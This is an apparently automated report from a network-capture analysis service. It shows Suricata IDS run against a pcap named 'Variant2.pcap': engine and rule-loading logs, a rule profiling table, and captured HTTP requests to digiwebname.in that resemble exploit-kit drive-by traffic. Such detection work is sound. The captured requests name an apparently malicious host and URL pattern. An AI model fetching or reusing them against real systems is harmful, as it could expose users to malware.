Filename: Variant2.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 9.32131505013 seconds
Hash: 4c58c645061d62e63195d3f25b9611f1
Uploaded: 1542380231

Logfiles


suricata-report-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (18286 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/4c58c645061d62e63195d3f25b9611f1d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1456-Variant2.pcap -vvv -k none
elapsedtime:8.400815
stderr:
stdout:
16/11/2018 -- 14:57:12 - <Info> - Configuration node 'rule-files' redefined.
16/11/2018 -- 14:57:12 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/11/2018 -- 14:57:12 - <Info> - CPUs/cores online: 1
16/11/2018 -- 14:57:12 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31874 and 'request-body-inspect-window' set to 16645 after randomization.
16/11/2018 -- 14:57:12 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32449 and 'response-body-inspect-window' set to 16844 after randomization.
16/11/2018 -- 14:57:12 - <Config> - DNS request flood protection level: 500
16/11/2018 -- 14:57:12 - <Config> - DNS per flow memcap (state-memcap): 524288
16/11/2018 -- 14:57:12 - <Config> - DNS global memcap: 16777216
16/11/2018 -- 14:57:12 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/11/2018 -- 14:57:12 - <Config> - preallocated 1000 hosts of size 136
16/11/2018 -- 14:57:12 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/11/2018 -- 14:57:12 - <Config> - using magic-file /usr/share/file/magic
16/11/2018 -- 14:57:12 - <Config> - Core dump size is unlimited.
16/11/2018 -- 14:57:12 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/11/2018 -- 14:57:12 - <Config> - preallocated 1000 defrag trackers of size 168
16/11/2018 -- 14:57:12 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/11/2018 -- 14:57:12 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/11/2018 -- 14:57:12 - <Config> - stream "memcap": 33554432
16/11/2018 -- 14:57:12 - <Config> - stream "midstream" session pickups: disabled
16/11/2018 -- 14:57:12 - <Config> - stream "async-oneside": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "checksum-validation": disabled
16/11/2018 -- 14:57:12 - <Config> - stream."inline": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "bypass": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "max-synack-queued": 5
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "memcap": 134217728
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "depth": 0
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "toserver-chunk-size": 2561
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "toclient-chunk-size": 2524
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly.raw: enabled
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "segment-prealloc": 2048
16/11/2018 -- 14:57:12 - <Config> - Delayed detect disabled
16/11/2018 -- 14:57:12 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/11/2018 -- 14:57:12 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/11/2018 -- 14:57:12 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/11/2018 -- 14:57:12 - <Config> - prefilter engines: MPM
16/11/2018 -- 14:57:12 - <Config> - IP reputation disabled
16/11/2018 -- 14:57:12 - <Perf> - Registered 148 keyword profiling counters.
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
16/11/2018 -- 14:57:14 - <Config> - No rules loaded from ET-emerging-icmp.rules.
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
16/11/2018 -- 14:57:16 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
16/11/2018 -- 14:57:16 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
16/11/2018 -- 14:57:17 - <Config> - No rules loaded from local.rules.
16/11/2018 -- 14:57:17 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
16/11/2018 -- 14:57:17 - <Info> - Threshold config parsed: 0 rule(s) found
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tcp-packet
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tcp-stream
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for udp-packet
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for other-ip
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_uri
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_client_body
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept_enc
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept_lang
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_referer
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_connection
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_method
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_uri
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_user_agent
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_host
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_host
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_stat_msg
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_stat_code
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dns_query
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_sni
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 14:57:17 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
16/11/2018 -- 14:57:17 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/11/2018 -- 14:57:17 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
16/11/2018 -- 14:57:17 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
16/11/2018 -- 14:57:17 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
16/11/2018 -- 14:57:17 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
16/11/2018 -- 14:57:17 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
16/11/2018 -- 14:57:17 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/11/2018 -- 14:57:18 - <Perf> - Unique rule groups: 111
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver TCP packet": 31
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient TCP packet": 20
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver TCP stream": 31
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient TCP stream": 21
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver UDP packet": 33
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient UDP packet": 15
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "other IP packet": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_uri": 8
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_response_line": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_header": 6
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_header": 3
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_header_names": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_start": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_method": 3
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_host": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver tls_sni": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver file_data": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient file_data": 5
16/11/2018 -- 14:57:19 - <Perf> - Registered 18241 rule profiling counters.
16/11/2018 -- 14:57:19 - <Info> - fast output device (regular) initialized: alert
16/11/2018 -- 14:57:19 - <Info> - eve-log output device (regular) initialized: eve.json
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'alert'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'http'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'dns'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'tls'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'files'
16/11/2018 --

This file has been truncated.


suricata-4.0.0-etopen-all-perf.txt-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (70359 bytes)
  --------------------------------------------------------------------------
  Date: 11/16/2018 -- 14:57:21. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2019881      1        3        18427894     8.07   97       0        15667122    189978.29   0.00        189978.29  
  2        2017552      1        6        23507456     10.29  678      0        13116585    34671.76    0.00        34671.76   
  3        2023614      1        3        12311052     5.39   2        0        12308243    6155526.00  0.00        6155526.00 
  4        2018496      1        9        5304902      2.32   97       0        2526692     54689.71    0.00        54689.71   
  5        2025185      1        3        9613623      4.21   77       0        671994      124852.25   0.00        124852.25  
  6        2015977      1        7        595584       0.26   1        0        595584      595584.00   0.00        595584.00  
  7        2019185      1        4        944022       0.41   7        0        488946      134860.29   0.00        134860.29  
  8        2018299      1        3        3874801      1.70   15       0        442434      258320.07   0.00        258320.07  
  9        2020865      1        3        5276046      2.31   36       0        409629      146556.83   0.00        146556.83  
  10       2017072      1        3        1396294      0.61   9        0        408391      155143.78   0.00        155143.78  
  11       2017899      1        4        345864       0.15   1        0        345864      345864.00   0.00        345864.00  
  12       2017501      1        2        1108285      0.49   5        0        344370      221657.00   0.00        221657.00  
  13       2020979      1        3        2015416      0.88   24       0        336392      83975.67    0.00        83975.67   
  14       2020397      1        2        302145       0.13   1        0        302145      302145.00   0.00        302145.00  
  15       2017502      1        2        967921       0.42   5        0        301395      193584.20   0.00        193584.20  
  16       2017500      1        2        965964       0.42   5        0        281018      193192.80   0.00        193192.80  
  17       2021749      1        6        879688       0.39   4        0        271237      219922.00   0.00        219922.00  
  18       2020842      1        2        594532       0.26   4        0        269631      148633.00   0.00        148633.00  
  19       2017499      1        2        849954       0.37   5        0        245575      169990.80   0.00        169990.80  
  20       2019181      1        7        550603       0.24   4        0        229724      137650.75   0.00        137650.75  
  21       2022797      1        2        201911       0.09   1        0        201911      201911.00   0.00        201911.00  
  22       2018342      1        2        444695       0.19   4        0        167044      111173.75   0.00        111173.75  
  23       2018469      1        2        156690       0.07   1        0        156690      156690.00   0.00        156690.00  
  24       2018358      1        7        3828548      1.68   105      0        145425      36462.36    0.00        36462.36   
  25       2017824      1        3        1223940      0.54   17       0        145128      71996.47    0.00        71996.47   
  26       2018440      1        4        136725       0.06   1        0        136725      136725.00   0.00        136725.00  
  27       2025044      1        2        172212       0.08   2        0        134820      86106.00    0.00        86106.00   
  28       2025064      1        5        3773224      1.65   97       0        132949      38899.22    0.00        38899.22   
  29       2022989      1        2        615707       0.27   8        0        121893      76963.38    0.00        76963.38   
  30       2015045      1        4        114860       0.05   1        0        114860      114860.00   0.00        114860.00  
  31       2024228      1        3        470699       0.21   6        0        107776      78449.83    0.00        78449.83   
  32       2021035      1        3        157518       0.07   3        0        102300      52506.00    0.00        52506.00   
  33       2017963      1        3        101263       0.04   1        0        101263      101263.00   0.00        101263.00  
  34       2014913      1        2        150027       0.07   2        0        100276      75013.50    0.00        75013.50   
  35       2015978      1        7        188339       0.08   2        0        99331       94169.50    0.00        94169.50   
  36       2018260      1        4        637791       0.28   9        0        99000       70865.67    0.00        70865.67   
  37       2018226      1        3        98060        0.04   1        0        98060       98060.00    0.00        98060.00   
  38       2025040      1        3        141727       0.06   2        0        97981       70863.50    0.00        70863.50   
  39       2025043      1        2        170397       0.07   2        0        97817       85198.50    0.00        85198.50   
  40       2011894      1        19       3420123      1.50   97       0        97718       35259.00    0.00        35259.00   
  41       2025047      1        3        179464       0.08   2        0        96640       89732.00    0.00        89732.00   
  42       2018010      1        5        2220656      0.97   97       0        96108       22893.36    0.00        22893.36   
  43       2015711      1        6        94945        0.04   1        0        94945       94945.00    0.00        94945.00   
  44       2018005      1        6        358960       0.16   4        0        94167       89740.00    0.00        89740.00   
  45       2019655      1        6        139949       0.06   2        1        93837       69974.50    93837.00    46112.00   
  46       2017811      1        2        163696       0.07   3        0        93616       54565.33    0.00        54565.33   
  47       2011988      1        5        160900       0.07   3        0        93332       53633.33    0.00        53633.33   
  48       2025054      1        2        170507       0.07   2        0        93114       85253.50    0.00        85253.50   
  49       2022410      1        2        418925       0.18   6        0        91588       69820.83    0.00        69820.83   
  50       2016587      1        6        164072       0.07   2        0        91384       82036.00    0.00        82036.00   
  51       2017416      1        6        90189        0.04   1        0        90189       90189.00    0.00        90189.00   
  52       2018346      1        3        89716        0.04   1        0        89716       89716.00    0.00        89716.00   
  53       2018407      1        9        854765       0.37   14       13       88779       61054.64    62705.62    39592.00   
  54       2016242      1        6        161843       0.07   2        0        87797       80921.50    0.00        80921.50   
  55       2015707      1        2        228262       0.10   4        0        87770       57065.50    0.00        57065.50   
  56       2022054      1        3        882973       0.39   13       0        86392       67921.00    0.00        67921.00   
  57       2016734      1        2        159702       0.07   2        0        84683       79851.00    0.00        79851.00   
  58       2019091      1        3        476840       0.21   9        0        83064       52982.22    0.00        52982.22   
  59       2015556      1        21       82934        0.04   1        0        82934       82934.00    0.00        82934.00   
  60       2016393      1        3        161145       0.07   2        0        82741       80572.50    0.00        80572.50   
  61       2016333      1        4        150072       0.07   2        0        82373       75036.00    0.00        75036.00   
  62       2024031      1        2        81649        0.04   1        0        81649       81649.00    0.00        81649.00   
  63       2018981      1        4        2752139      1.21   97       0        78279       28372.57    0.00        28372.57   
  64       2023150      1        3        78118        0.03   1        0        78118       78118.00    0.00        78118.00   
  65       2010067      1        10       220652       0.10   4        0        78019       55163.00    0.00        55163.00   
  66       2024565      1        3        218561       0.10   4        3        77711       54640.25    60893.67    35880.00   
  67       2022666      1        4        76891        0.03   1        0        76891       76891.00    0.00        76891.00   
  68       2018053      1        4        324685       0.14   5        0        75615       64937.00    0.00        64937.00   
  69       2018452      1        15       3426111      1.50   97       0        75337       35320.73    0.00        35320.73   
  70       2003492      1        30       2349636      1.03   100      0        75321       23496.36    0.00        23496.36   
  71       2022682      1        3        75300        0.03   1        0        75300       75300.00    0.00        75300.00   
  72       2022147      1        2        1182234      0.52   41       0        75051       28834.98    0.00        28834.98   
  73       2024650      1        1        1091054      0.48   93       0        74346       11731.76    0.00        11731.76   
  74       2016537      1        2        8776578      3.84   578      0        73890       15184.39    0.00        15184.39   
  75       2022502      1        4        2940397      1.29   99       0        73875       29700.98    0.00        29700.98   
  76       2015739      1        6        146348       0.06   2        0        73834       73174.00    0.00        73174.00   
  77       2021501      1        3        215242       0.09   6        0        73768       35873.67    0.00        35873.67   
  78       2024771      1        1        7006182      3.07   949      0        73314       7382.70     0.00        7382.70    
  79       2021762      1        2        135472       0.06   4        0        72147       33868.00    0.00        33868.00   
  80       2015823      1        6        143004       0.06   2        0        71766       71502.00    0.00        71502.00   
  81       2020825      1        6        75045        0.03   2        0        71762       37522.50    0.00        37522.50   
  82       2012981      1        5        435213       0.19   12       0        71073       36267.75    0.00        36267.75   
  83       2015846      1        3        70737        0.03   1        0        70737       70737.00    0.00        70737.00   
  84       2017613      1        9        3123035      1.37   97       0        70701       32196.24    0.00        32196.24   
  85       2024769      1        2        137528       0.06   2        0        69802       68764.00    0.00        68764.00   
  86       2022221      1        3        488400       0.21   9        0        69454       54266.67    0.00        54266.67   
  87       2020705      1        4        2143979      0.94   100      0        69273       21439.79    0.00        21439.79   
  88       2018262      1        3        69146        0.03   1        0        69146       69146.00    0.00        69146.00   
  89       2017785      1        2        69025        0.03   1        0        69025       69025.00    0.00        69025.00   
  90       2018983      1        7        2775278      1.22   97       0        68845       28611.11    0.00        28611.11   
  91       2014520      1        6        600879       0.26   66       0        68789       9104.23     0.00        9104.23    
  92       2022503      1        2        68312        0.03   1        0        68312       68312.00    0.00        68312.00   
  93       2018064      1        2        64877        0.03   1        0        64877       64877.00    0.00        64877.00   
  94       2018958      1        18       2343730      1.03   97       0        64416       24162.16    0.00        24162.16   
  95       2017073      1        3        63227        0.03   1        0        63227       63227.00    0.00        63227.00   
  96       2015695      1        4        63030        0.03   1        0        63030       63030.00    0.00        63030.00   
  97       2022609      1        2        3077856      1.35   87       0        62296       35377.66    0.00        35377.66   
  98       2017181      1        6        94125        0.04   2        0        61480       47062.50    0.00        47062.50   
  99       2019344      1        5        3349793      1.47   97       0        60689       34533.95    0.00        34533.95   
  100      2017295      1        6        100644       0.04   2        0        60107       50322.00    0.00        50322.00   
  101      2016539      1        7        165756       0.07   3        3        59397       55252.00    55252.00    0.00       
  102      2017568      1        3        58155        0.03   1        0        58155       58155.00    0.00        58155.00   
  103      2014288      1        2        89611        0.04   2        0        57933       44805.50    0.00        44805.50   
  104      2018225      1        2        57457        0.03   1        0        57457       57457.00    0.00        57457.00   
  105      2009702      1        5        483446       0.21   33       0        57242       14649.88    0.00        14649.88   
  106      2022543      1        1        263139       0.12   14       0        56793       18795.64    0.00        18795.64   
  107      2019612      1        7        316041       0.14   8        1        54375       39505.12    54375.00    37380.86   
  108      2014911      1        10       308300       0.14   15       0        54034       20553.33    0.00        20553.33   
  109      2016858      1        10       2738623      1.20   97       0        53795       28233.23    0.00        28233.23   
  110      2024555      1        7        52577        0.02   1        1        52577       52577.00    52577.00    0.00       
  111      2022074      1        3        336679       0.15   11       0        51384       30607.18    0.00        30607.18   
  112      2016223      1        10       2164075      0.95   100      0        51273       21640.75    0.00        21640.75   
  113      2020982      1        3        51254        0.02   1        1        51254       51254.00    51254.00    0.00       
  114      2024178      1        2        2213464      0.97   97       0        50934       22819.22    0.00        22819.22   
  115      2014703      1        9        345908       0.15   33       0        50504       10482.06    0.00        10482.06   
  116      2017166      1        4        100254       0.04   2        0        50447       50127.00    0.00        50127.00   
  117      2001195      1        9        1023391      0.45   86       0        50416       11899.90    0.00        11899.90   
  118      2024829      1        2        568843       0.25   25       0        50280       22753.72    0.00        22753.72   
  119      2014750      1        2        117285       0.05   3        0        49978       39095.00    0.00        39095.00   
  120      2017039      1        3        102523       0.04   3        0        49685       34174.33    0.00        34174.33   
  121      2019683      1        6        49169        0.02   1        1        49169       49169.00    49169.00    0.00       
  122      2019368      1        3        48790        0.02   1        0        48790       48790.00    0.00        48790.00   
  123      2021381      1        7        156437       0.07   4        0        48683       39109.25    0.00        39109.25   
  124      2018242      1        5        2597382      1.14   97       0        48560       26777.13    0.00        26777.13   
  125      2020380      1        3        

This file has been truncated. Go here to download in full.


unified2.alert.1542380239 - (50423 bytes) - download
GET /6ktpi5xo/3830948c194842760701040b0b0f095a010b000b0d560858060c0b060a060a5a;118800;94 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://digiwebname.in/6ktpi5xo/PoHWLGZwrjXeGDG3P-I5
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: digiwebname.in
Connection: Keep-Alive

GET /6ktpi5xo/7d0d7c94be7afa7a5b0d525f0558080d0557035f0301090f0250085204510b0d;910 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: digiwebname.in
Connection: Keep-Alive
Cache-Control: no-cache

GET /6ktpi5xo/39e112e34c7d1c884055130a0309540a010a560a05505508060d5d070200570a;4060531 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
